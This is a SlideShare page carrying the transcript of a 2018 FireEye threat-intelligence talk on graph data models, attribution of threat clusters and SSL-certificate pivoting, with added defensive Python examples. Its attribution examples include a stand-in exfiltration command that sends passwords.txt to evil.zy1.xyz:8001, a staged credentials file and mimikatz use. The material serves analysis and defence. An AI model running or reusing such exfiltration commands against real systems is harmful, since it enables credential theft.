Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 

Recently uploaded (20)

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 

CONFidence 2018: Everything’s Connected aka Threat Intelligence 102 (Marcin Siedlarz)

  • 1. Everything’s Connected aka Threat Intelligence 102 Marcin Siedlarz TORE Advanced Practices – Adversary Pursuit FireEye
  • 2. About me, the preso and the motivation 2
  • 3. ©2018 FireEye | Private & Confidential About me § 9 years of experience of incident response and technical analysis of some of the most prolific and advanced cyber threats § CN/RU threat groups targeting PL gov § Contributing author to the Dragonfly research and whitepaper § Research of various APTs at FireEye 3
  • 4. ©2018 FireEye | Private & Confidential Leonardo da Vinci 4 Realize that everything connects to everything else.
  • 5. ©2018 FireEye | Private & Confidential 5
  • 7. ©2018 FireEye | Private & Confidential Intelligence Objectives & Principles 7 Reduce uncertainty Knowledge that is: • Accurate • Timely • Relevant Knowledge about: • The threat • Surrounding environment • Visibility on threat actors, exploits, and malware • Tactical: TTPs, indicators, artifacts • Strategic: TTPs over time, industries targeted, data stolen, analysis of motivations and who benefits, attacker infrastructure • Attribution capability
  • 8. ©2018 FireEye | Private & Confidential Attribution capability 8 Incident1 IOC IOC Incident2 IOC IOC Incident3 IOC
  • 9. ©2018 FireEye | Private & Confidential Attribution capability 9 IOCs APTxTTPs TTPs
  • 10. ©2018 FireEye | Private & Confidential 10
  • 12. ©2018 FireEye | Private & Confidential 12 car VIN color manufacturing date reg plate number reg date person first name surname birthdate
  • 13. ©2018 FireEye | Private & Confidential 13 car reg plate person carhasreg personhascar Queries: • All red cars manufactured in 2012 • All red cars belonging to male 21- 25 yrs old, sedan, registration plate starts with „W”
  • 14. Cyber threat data model 14
  • 15. ©2018 FireEye | Private & Confidential Example nodes and edges (malware comms) 15 file fqdn file file ipv4srv url rundnslookup runconnect rungeturl
  • 16. ©2018 FireEye | Private & Confidential Example nodes and edges (hostops) 16 host file host host host hostcmd fsrefs latmove orghostcmd
  • 17. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 17 email file sentemail email emailto filefile subfilesubfile url filedocs
  • 18. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 18 email bhv/meth.phish.sender file bhv/meth.phish.msg sentemail email bhv/meth.phish.vic emailto file bhv/meth.phish .payload file bhv/meth.phish.body subfilesubfile url bhv/meth.phish .payload filedocs
  • 19. ©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 19
  • 24. Aspects -> Context (bhv/meth)
    bhv/meth tree:
    – phish: vic, sender, body, payload
    – fileops: macro, obf
    – hostops: wipe, datamine
  • 25. Aspects -> Context (bhv/capa)
    bhv/capa tree:
    – c2: twitter, github
    – crypt: aes128, rc4
    – datamine: keylog, screen, files
  • 26. Aspects -> Context (sig)
    sig/ tree:
    – cve: 2017, 2018
    – exploit
    – mal: sogu, zxshell
  • 28. Example nodes and edges (spear-phishing)
    file (bhv/meth.phish.payload): file:basename = "Payroll 2018.xls" +bhv/meth.phish.payload +sig/mal.foobar +bhv/meth.fileops.macro
    file: +sig/mal.foobar +bhv/meth.codelang.vbscript +bhv/role.macro
    url: url="https://foobarxyz.com/foo.exe" +sig/mal.foobar
  • 29. Example nodes and edges (spear-phishing)
    url: url="https://foobarxyz.com/foo.exe" +sig/mal.foobar
    file: file:basename=foo.exe +sig/mal.foobar +code/foobar +bhv/role.backdoor +bhv/capa.comms.http +bhv/capa.cmd.exec
    fqdn: foobarxyz.com
    email: foobar@example.com
    ipv4addr: 1.2.3.4
  • 30. Example nodes and edges (spear-phishing)
    file: foo.exe
    url: url="https://c2domain.com/foo.php" +sig/mal.foobar
    fqdn: fqdn="c2domain.com" +sig/mal.foobar
    host
    url
    file: file:base=meow.exe +code/mimikatz
  • 31. Example nodes and edges (spear-phishing)
    host
    file: file:base=meow.exe +code/mimikatz
    file: file:base=passwords.txt fs:rawpath=C:\xyz\passwords.txt +trend/exfil.creds.hash
    hostcmd: ping evil.zy1.xyz
    hostcmd: foo.exe –send passwords.txt evil.zy1.xyz:8001 +bhv/meth.exfil +sig/mal.foobar
  • 33. +thr / +apt
    § Most important aspect tree
    § Represents the analytical assessment that an indicator is used by a threat group
    § Several considerations
      – Less rigid attribution framework == more attribution mistakes
      – Analytic confidence
      – Correlation value
      – Bias
  • 34. We should be handing out UNCs like candy
  • 35. apt/ tree: apt1, apt2, aptx, unc1, unc2
  • 37. unc1 + unc2
    node | sig | bhv | apt
    foobarsender@yahoo.com | | meth.phish.sender | unc1
    Payroll 2018.xls | mal.foobar | meth.phish.payload | unc1
    foobarxyz.com | mal.foobar | | unc1
    foo.exe | mal.foobar | role.backdoor | unc1
    c2domain.com | mal.foobar | | unc1
    meow.exe | rel.mimikatz | | unc1
    foo.exe –send passwords.txt evil.zy1.xyz:8001 | mal.foobar | meth.exfil | unc1
  • 38. unc1 + unc2
    node | sig | bhv | apt
    random@mail.com | | meth.phish.sender |
    Job offer.docx | mal.foobar | meth.phish.payload |
    barfooabc.com | mal.foobar | |
    abc.exe | mal.foobar | role.backdoor |
    random.com | mal.foobar | |
    mimi.exe | rel.mimikatz | |
  • 39. unc1 + unc2
    Same table as slide 38, with every row now tagged apt = unc2.
  • 40. unc1 + unc2
    Same table as slide 39 plus one more row, not yet attributed:
    foo.exe –send passwords.txt evil.zy1.xyz:8001 | mal.foobar | meth.exfil |
  • 41. unc1 + unc2
    node | sig | bhv | apt
    random@mail.com | | meth.phish.sender | unc2
    Job offer.docx | mal.foobar | meth.phish.payload | unc2
    barfooabc.com | mal.foobar | | unc2
    abc.exe | mal.foobar | role.backdoor | unc2
    random.com | mal.foobar | | unc2
    mimi.exe | rel.mimikatz | | unc2
    foo.exe –send passwords.txt evil.zy1.xyz:8001 | mal.foobar | meth.exfil | unc2
  • 42. unc1 + unc2: Overlaps
    Trait | Example | Overlap conf. level
    Use of FOOBAR | | Low
    Use of same stagedir | C:\xyz\passwords.txt | Medium
    Use of same exfil fqdn | evil.zy1.xyz | High
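The data model of slides 12-42 (nodes with a form and a primary value, named edges between them, and a tree of aspect tags such as bhv/meth.phish.sender or apt/unc1) together with the unc1 + unc2 overlap assessment of slides 37-42, as one small added Python example. It is not code from the deck, from FireEye or from the Synapse project. The cluster data follows the tables on slides 37 and 41; the edge name `urlfile`, the host name `victim-host-1`, the `exfil_fqdn` property and the unc2 copy of the passwords.txt stagedir are assumptions made so that all three overlap traits of slide 42 can be computed.

```python
"""Tiny property graph in the spirit of the nodes / edges / aspect-tree model of
slides 12-42.  Added example, standard library only; not FireEye's or Synapse's code."""
from collections import defaultdict, deque
from dataclasses import dataclass, field

@dataclass
class Node:
    form: str                                  # node type: email, file, fqdn, url, host, hostcmd
    value: str                                 # primary property: address, basename, fqdn, command
    tags: set = field(default_factory=set)     # aspects such as "sig/mal.foobar" or "apt/unc1"
    props: dict = field(default_factory=dict)  # secondary properties such as "fs:rawpath"

def tag_matches(tag, query):
    """Aspects form a tree: 'bhv/meth' matches 'bhv/meth.phish.sender' and 'bhv' matches both."""
    return tag == query or tag.startswith(query + ".") or tag.startswith(query + "/")

class Graph:
    def __init__(self):
        self.nodes = {}                        # (form, value) -> Node
        self.edges = defaultdict(list)         # (form, value) -> [(edge name, (form, value))]
    def add(self, form, value, tags=(), props=None):
        node = self.nodes.setdefault((form, value), Node(form, value))
        node.tags.update(tags)                 # an indicator seen in two intrusions keeps both apt tags
        node.props.update(props or {})
    def link(self, src, edge, dst):
        self.edges[src].append((edge, dst))
    def by_tag(self, query):
        return [n for n in self.nodes.values() if any(tag_matches(t, query) for t in n.tags)]
    def reachable(self, start):
        """Everything connected to `start` by following edges outward (breadth-first)."""
        seen, todo = {start}, deque([start])
        while todo:
            new = [dst for _, dst in self.edges[todo.popleft()] if dst not in seen]
            seen.update(new)
            todo.extend(new)
        return seen

# Overlap traits and confidence levels from slide 42: a trait maps a node to a
# comparable value (or None); a value produced in both clusters is an overlap.
TRAITS = [
    ("Use of FOOBAR", lambda n: "FOOBAR" if "sig/mal.foobar" in n.tags else None, "Low"),
    ("Use of same stagedir", lambda n: n.props.get("fs:rawpath"), "Medium"),
    ("Use of same exfil fqdn", lambda n: n.props.get("exfil_fqdn"), "High"),
]
LEVEL = {"Low": 1, "Medium": 2, "High": 3}

def overlaps(g, apt_a, apt_b):
    """[(trait, shared value, confidence)] for every trait both clusters exhibit."""
    a, b = g.by_tag(apt_a), g.by_tag(apt_b)
    found = []
    for name, key, level in TRAITS:
        shared = ({key(n) for n in a} & {key(n) for n in b}) - {None}
        found.extend((name, value, level) for value in sorted(shared))
    return found

def shared_nodes(g, apt_a, apt_b):
    """The very same indicators tagged with both groups."""
    return sorted((n.form, n.value) for n in g.by_tag(apt_a) if any(tag_matches(t, apt_b) for t in n.tags))

def merge_confidence(found):
    """The strongest single overlap drives the confidence that two UNCs are one group."""
    return max((level for _, _, level in found), key=LEVEL.__getitem__, default=None)

EXFIL_CMD = "foo.exe –send passwords.txt evil.zy1.xyz:8001"   # hostcmd from slides 31/37/41
UNC1 = [  # slide 37 (passwords.txt from slide 31); meow.exe omitted for brevity
    ("email", "foobarsender@yahoo.com", "bhv/meth.phish.sender"),
    ("file", "Payroll 2018.xls", "sig/mal.foobar bhv/meth.phish.payload bhv/meth.fileops.macro"),
    ("file", "foo.exe", "sig/mal.foobar bhv/role.backdoor bhv/capa.comms.http bhv/capa.cmd.exec"),
    ("fqdn", "c2domain.com", "sig/mal.foobar"),
    ("file", "passwords.txt", "trend/exfil.creds.hash"),
    ("hostcmd", EXFIL_CMD, "sig/mal.foobar bhv/meth.exfil"),
]
UNC2 = [  # slide 41; the passwords.txt row is constructed to model slide 42's shared stagedir
    ("email", "random@mail.com", "bhv/meth.phish.sender"),
    ("file", "Job offer.docx", "sig/mal.foobar bhv/meth.phish.payload"),
    ("file", "abc.exe", "sig/mal.foobar bhv/role.backdoor"),
    ("file", "passwords.txt", ""),
    ("hostcmd", EXFIL_CMD, ""),
]
PROPS = {("file", "passwords.txt"): {"fs:rawpath": r"C:\xyz\passwords.txt"},
         ("hostcmd", EXFIL_CMD): {"exfil_fqdn": "evil.zy1.xyz"}}   # exfil_fqdn is an assumed prop
EDGES = [  # edge names from slides 15-17 except the assumed "urlfile"; the host name is assumed
    (("email", "foobarsender@yahoo.com"), "sentemail", ("file", "Payroll 2018.xls")),
    (("file", "Payroll 2018.xls"), "filedocs", ("url", "https://foobarxyz.com/foo.exe")),
    (("url", "https://foobarxyz.com/foo.exe"), "urlfile", ("file", "foo.exe")),
    (("file", "foo.exe"), "rundnslookup", ("fqdn", "c2domain.com")),
    (("host", "victim-host-1"), "hostcmd", ("hostcmd", EXFIL_CMD)),
    (("host", "victim-host-1"), "fsrefs", ("file", "passwords.txt")),
]

def build_demo():
    """Populate the graph with the unc1 cluster, the unc2 cluster and the known edges."""
    g = Graph()
    for apt, rows in (("apt/unc1", UNC1), ("apt/unc2", UNC2)):
        for form, value, tags in rows:
            g.add(form, value, set(tags.split()) | {apt}, PROPS.get((form, value)))
    for src, edge, dst in EDGES:
        g.link(src, edge, dst)
    return g
```

Tag queries walk the tree (`by_tag("bhv/meth.phish")` also returns nodes tagged `bhv/meth.phish.sender`), `reachable` is the "everything is connected" walk outward from the sender address, and `overlaps` lists the traits both clusters share with the confidence level the deck assigns to each. The merge decision then rests on the strongest overlap: here the high-confidence shared exfil fqdn, not the low-confidence shared malware family.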
  • 44. ZXSHELL ssl certificates
    (diagram) SSL client HELLO sig, linked to servers: 78.189.98.__, 122.252.228.__, 213.5.55.__, 80.69.180.__, 119.47.69.__, 14.55.203.__
  • 45. ZXSHELL ssl certificates
    -----BEGIN CERTIFICATE-----
    MIIDBjCCAe4CCQDAg0xj8aawHTANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
    VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0
    cyBQdHkgTHRkMB4XDTE2MDgxMDAyMzQxN1oXDTE3MDgxMDAyMzQxN1owRTELMAkG
    A1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUxITAfBgNVBAoTGEludGVybmV0
    IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
    AM+arV8LRA3mB6PHuo37Y00/qzKyNJiyBOrlbO9BTUwnbPyNCSCgorESHqg74m+2
    Q2VK+YcBkWSFdwl2qZ3Gqzh4YRf6+KqVfdk8BtDDnoRy21D3ZJAEJFU3nRNgRFhM
    p+aysu7YTRnoM6YGut+7IKycwiU5SdtD+gEp7REthayg+wKIgbjI0sx7OaV0Rwzs
    D5ZYcrFb9V39VVprHMAeVbpsmu8n8Z6lIr7WWTPM13UZW5B2Qa7Dum+ylLk/Zp20
    gooelLZjmWGGvqXAcxkxkMs0g+KBrpflGMBj1JtHS2p8qLGl2V/ZayaU5gVWABEr
    cMbYOO/ZvSAMIb2n2UDyuRcCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAf3rWXfyi
    C5OTpZYLeHBQL3hFyuK3HNBCwCSeKDutNzDoB4KHEHtSjqvp+kz/kcLU13sc8YFj
    HQrkdGZqyz8SNt1jna97opcSr94jDGZW/d8maZbKPN3tKt17yRovjBSkyIr1LtQ7
    Nbo8EdGSsxBMnYxNqYUNqI94pg1Xr1WVmShhszO+BLl2JX1+2oMOV4GnvNDcaL9v
    LmuDDTzabLqWp280i1UBFbXuNid8DW7UOhhkn+YvQAoxxdqCSvHBgRXjqVNv2bcs
    86E1NC8lbItLFK2/SvuyViuZA95A4RHParDtwuYGxSemp+mtt0qIck44G+MP+Jn0
    rsKK05+u6n5/6g==
    -----END CERTIFICATE-----
    x509:serial=d9:be:00:43:b7:96:5c:48
    (diagram) servers: 78.189.98.__, 122.252.228.__, 213.5.55.__, 80.69.180.__, 119.47.69.__, 14.55.203.__
  • 46. ZXSHELL ssl certificates
    (diagram) 49.206.128.35, x509:serial=d9:be:00:43:b7:96:5c:48
    pdns: philippinenews.mooo.com, second.photo-frame.com, shoping.jumpingcrab.com
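The x509:serial pivot of slides 45-46 as an added Python example (standard library only; not FireEye's tooling): a minimal DER walker pulls the serial and validity window out of a PEM certificate, and observed servers are then grouped by serial. The PEM is the one reproduced on slide 45; it decodes to a different serial than the x509:serial value printed beside it on the slide, so it serves here purely as sample input for the parser. The server IPs in OBSERVED are constructed documentation-range placeholders, not the slide's servers.

```python
"""Extract the x509 serial and validity window from a PEM certificate with a
minimal DER (ASN.1 tag-length-value) walk, then group observed servers by serial:
the pivot of slides 44-48.  Added example, standard library only; not FireEye's code."""
import base64
from collections import defaultdict

# The certificate reproduced on slide 45, used here as sample input only.
PEM = """-----BEGIN CERTIFICATE-----
MIIDBjCCAe4CCQDAg0xj8aawHTANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0
cyBQdHkgTHRkMB4XDTE2MDgxMDAyMzQxN1oXDTE3MDgxMDAyMzQxN1owRTELMAkG
A1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUxITAfBgNVBAoTGEludGVybmV0
IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AM+arV8LRA3mB6PHuo37Y00/qzKyNJiyBOrlbO9BTUwnbPyNCSCgorESHqg74m+2
Q2VK+YcBkWSFdwl2qZ3Gqzh4YRf6+KqVfdk8BtDDnoRy21D3ZJAEJFU3nRNgRFhM
p+aysu7YTRnoM6YGut+7IKycwiU5SdtD+gEp7REthayg+wKIgbjI0sx7OaV0Rwzs
D5ZYcrFb9V39VVprHMAeVbpsmu8n8Z6lIr7WWTPM13UZW5B2Qa7Dum+ylLk/Zp20
gooelLZjmWGGvqXAcxkxkMs0g+KBrpflGMBj1JtHS2p8qLGl2V/ZayaU5gVWABEr
cMbYOO/ZvSAMIb2n2UDyuRcCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAf3rWXfyi
C5OTpZYLeHBQL3hFyuK3HNBCwCSeKDutNzDoB4KHEHtSjqvp+kz/kcLU13sc8YFj
HQrkdGZqyz8SNt1jna97opcSr94jDGZW/d8maZbKPN3tKt17yRovjBSkyIr1LtQ7
Nbo8EdGSsxBMnYxNqYUNqI94pg1Xr1WVmShhszO+BLl2JX1+2oMOV4GnvNDcaL9v
LmuDDTzabLqWp280i1UBFbXuNid8DW7UOhhkn+YvQAoxxdqCSvHBgRXjqVNv2bcs
86E1NC8lbItLFK2/SvuyViuZA95A4RHParDtwuYGxSemp+mtt0qIck44G+MP+Jn0
rsKK05+u6n5/6g==
-----END CERTIFICATE-----"""


def pem_to_der(pem):
    """Strip the armour lines and base64-decode the body."""
    body = "".join(line.strip() for line in pem.splitlines() if not line.startswith("-----"))
    return base64.b64decode(body)


def read_tlv(buf, pos=0):
    """Decode one DER element at pos: (tag, value bytes, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def children(seq):
    """Split the contents of a SEQUENCE or SET into its (tag, value) elements."""
    out, pos = [], 0
    while pos < len(seq):
        tag, val, pos = read_tlv(seq, pos)
        out.append((tag, val))
    return out


def asn1_time(tag, raw):
    """UTCTime (0x17, YYMMDDhhmmssZ; years below 50 mean 20xx) or GeneralizedTime
    (0x18, YYYYMMDDhhmmssZ) -> ISO 8601 text."""
    s = raw.decode("ascii")
    if tag == 0x18:
        year, s = s[:4], s[4:]
    else:
        yy = int(s[:2])
        year, s = str(2000 + yy if yy < 50 else 1900 + yy), s[2:]
    return f"{year}-{s[:2]}-{s[2:4]}T{s[4:6]}:{s[6:8]}:{s[8:10]}Z"


def cert_summary(pem):
    """Serial (colon-separated hex, as on the slide) and validity dates of one certificate."""
    der = pem_to_der(pem)
    tag, cert, end = read_tlv(der)
    if tag != 0x30 or end != len(der):
        raise ValueError("expected exactly one DER SEQUENCE")
    tbs = children(children(cert)[0][1])    # Certificate -> tbsCertificate -> its fields
    if tbs[0][0] == 0xA0:                   # explicit [0] version is optional (absent means v1)
        tbs = tbs[1:]
    serial = tbs[0][1].lstrip(b"\x00") or b"\x00"   # INTEGER; drop the positive sign-padding byte
    not_before, not_after = children(tbs[3][1])     # validity follows signatureAlgorithm and issuer
    return {"serial": ":".join(f"{b:02x}" for b in serial),
            "not_before": asn1_time(*not_before),
            "not_after": asn1_time(*not_after)}


def pivot_by_serial(observations):
    """Group (server IP, PEM) observations by serial; servers that present a certificate
    with the same serial are candidates for the same operator's infrastructure."""
    groups = defaultdict(set)
    for ip, pem in observations:
        groups[cert_summary(pem)["serial"]].add(ip)
    return {serial: sorted(ips) for serial, ips in groups.items()}


# Constructed observations with documentation-range IPs, not the slide's servers.
OBSERVED = [("192.0.2.10", PEM), ("198.51.100.7", PEM), ("203.0.113.5", PEM)]
```

In a real pipeline the observations come from a scanner or a passive SSL dataset, and the serial (together with the issuer, subject and validity window the same walk can extract) becomes a node property to pivot on, exactly as slide 46 pivots from one serial to a server and from the server to its pdns names.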
  • 47. ZXSHELL ssl certificates
    Source: https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/
  • 48. ZXSHELL ssl certificates
    (diagram) servers: 80.69.180.__, 27.106.22.__, 14.35.248.__, 139.162.55.__
  • 49. Launching your own CTI program
  • 50. Key components of a TI program: 4 DO's
    § TI personnel:
      – Small team, even 1-2 analysts will do
      – RE capability in the TI or larger SOC team
    § Technology stack that allows pushing signatures
      – snort
      – yara
    § Pivoting and context creation
    § Next steps:
      – graph database, proprietary <-> open-source (https://github.com/vertexproject/synapse)
  • 51. Key components of a TI program: 1 Don't
    § Newscaster "threat intelligence", aka let's buy a bunch of feeds, combine them together and brief C-level executives
    § Instead:
      – Focus on the data you already have (IR, SOC, external partnerships)
      – Get access to enrichment datasources (pdns, whois, ssl certificates)
      – Hunt for attacker activity
      – Tag and describe what you see
      – Pivot to find overlaps